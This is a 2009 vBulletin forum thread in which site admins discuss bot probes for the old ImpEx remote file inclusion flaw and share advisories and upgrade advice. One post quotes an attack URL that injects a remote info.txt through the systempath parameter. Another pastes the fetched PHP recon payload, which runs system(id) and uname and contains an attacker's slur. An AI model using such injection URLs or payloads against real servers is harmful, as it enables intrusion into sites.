Announcement

Collapse
No announcement yet.

Potential hack??

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Jobe1986
    replied
    I get these attempts daily on my forum, and mine is a quiet forum anyway. But at the end of the day, all the time you use the MOST up to date version of vBulletin, they are nothing more then attempts.

    Leave a comment:


  • Windsun
    replied
    We have been getting similar attacks from some of the same IP's.

    According to another post, this is an effort to exploit an old bug. However, the fact that these just started up in the past couple days, and that several people have reported them makes me wonder.

    Example:
    .../ForumVB/index.php/impex/ImpExModule.php?systempath=http://www.henneferkanuteam.de/apboard/info.txt????
    I suspect it is some random bot trying to attack any VB board hoping to find a version with the exploit unfixed, it is just the sudden appearance of these attacks that makes me wonder.
    Last edited by Windsun; Mon 5 Jan '09, 10:11pm.

    Leave a comment:


  • Sheridan
    replied
    I went to sleep....and then got up and opened my forum!

    Thank you!!!

    Leave a comment:


  • steven s
    replied
    Originally posted by Sheridan View Post
    Thank you...

    I have 3.7.0.. so am I screwed?
    I would say no. 3.7.0 was released April 2008.
    Don't forget, this was posted almost 3 years ago!
    Although, I would stay current on your versions.

    Edit: Open your forum and go to sleep.

    And more reading.
    http://www.securityfocus.com/bid/17206
    Vulnerable: VBulletin ImpEx 1.74
    - VBulletin VBulletin 3.5.4
    - VBulletin VBulletin 3.5.3
    - VBulletin VBulletin 3.5.2
    - VBulletin VBulletin 3.5.1
    1) You don't have ImpEx installed.
    2) You have v 3.7.0.

    Leave a comment:


  • Sheridan
    replied
    Thank you...

    I have 3.7.0.. so am I screwed?

    Leave a comment:


  • steven s
    replied
    http://xforce.iss.net/xforce/xfdb/25391

    Reported: Mar 23, 2006
    vBulletin ImpEx module ImpExData.php file include

    impex-impexdata-file-include (25391) Medium Risk Description:
    ImpEx could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL request to the ImpExData.php script using the 'systempath' variable to specify a malicious PHP file from a remote system, which would allow the attacker to execute arbitrary code on the vulnerable system.
    Platforms Affected:
    • Jelsoft Enterprises, ImpEx 1.74 and prior
    • Jelsoft Enterprises, vBulletin 3.5.0 or later

    Remedy:
    Upgrade to the latest version of vBulletin (1.75 or later), available from the vBulletin Web site. See References.
    Edit: You don't have ImpEx installed, so there is no danger.

    Leave a comment:


  • Sheridan
    replied
    doesn't make sense to me..that's why I made this post..

    but if you click on the link in your "whosonline" page that they are trying to access...your site will come up but it is not totally functional and it will have that odd address on the end of it.. It looks like the beginning of a re direct...

    And after I diabled guests...I have a stop sign next to the guests and the page they are trying to view.. So did I lock em out or not??

    I swear? Are there not any Vbulletin folks out on a Sunday night?

    Leave a comment:


  • gemmagy
    replied
    I went to http://www.scv.co.kr/zboard/info.txt which is part of the unknown path. This is what it says. Does any of this make any sense to you?

    <?phpfunction ConvertBytes($number) {$len = strlen($number);if($len < 4) {return sprintf("%d b", $number); }if($len >= 4 && $len <=6) {return sprintf("%0.2f Kb", $number/1024); }if($len >= 7 && $len <=9) {return sprintf("%0.2f Mb", $number/1024/1024); }return sprintf("%0.2f Gb", $number/1024/1024/1024); } echo "Osirys<br>";$un = @php_uname();$id1 = system(id);$pwd1 = @getcwd();$free1= diskfreespace($pwd1);$free = ConvertBytes(diskfreespace($pwd1));if (!$free) {$free = 0;}$all1= disk_total_space($pwd1);$all = ConvertBytes(disk_total_space($pwd1));if (!$all) {$all = 0;}$used = ConvertBytes($all1-$free1);$os = @PHP_OS;echo "0sirys was here and also is a ****ing gay..<br>";echo "uname -a: $un<br>";echo "os: $os<br>";echo "id: $id1<br>";echo "free: $free<br>";echo "used: $used<br>";echo "total: $all<br>";exit;

    Leave a comment:


  • steven s
    replied
    Originally posted by Sheridan View Post
    I don't have a folder on my server that says Impex... so I must not have it loaded..
    Then I would not worry about it.

    I'm running 3.7.0
    I would upgrade to 3.7.4p1 regardless.

    You are going to run out of banning room...lol..

    Go diable guests from viewing the forum..
    I don't think disabling guests won't do anything.

    Personally, I would not be concerned.

    Leave a comment:


  • Sheridan
    replied
    I don't have a folder on my server that says Impex... so I must not have it loaded..

    I'm running 3.7.0

    You are going to run out of banning room...lol..

    Go diable guests from viewing the forum..

    Leave a comment:


  • gemmagy
    replied
    I started banning the ip addresses that are at the unknown locations.

    Leave a comment:


  • DonkRydah
    replied
    this is really weird, my board had the exact same thing and i had like 7 "guests" having the same thing on the online page, i hopped on here to make a thread but i found this one. what exactly is this? oh yea, the unknown location is the exact same address as the picture first attached.

    Leave a comment:


  • steven s
    replied
    You don't have impex installed, do you?
    It looks like they are just fishing.

    I see people looking for files all the time in my error log.

    Leave a comment:


  • MoH672
    replied
    I have kept my 3.7 board shut down for now until someone responds with an answer.

    Leave a comment:


  • Sheridan
    replied
    I am seriously freaked out? How can I have an UNKNOWN LOCATION on the board?? I don't have a folder on my server for any of this..

    Are they re directing my site? It's like they are scanning my site page by page.. But I don't have a Impex page..

    I locked my board for awhile... But unlocked and they are back... from Colorado, Korea, and Masschusetts ..

    I just set my forum where unregistered guests canot view the forum. It seems to have locked them out so far. But this is bad for business...

    Help!!
    Last edited by Sheridan; Sun 4 Jan '09, 6:57pm.

    Leave a comment:

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...
X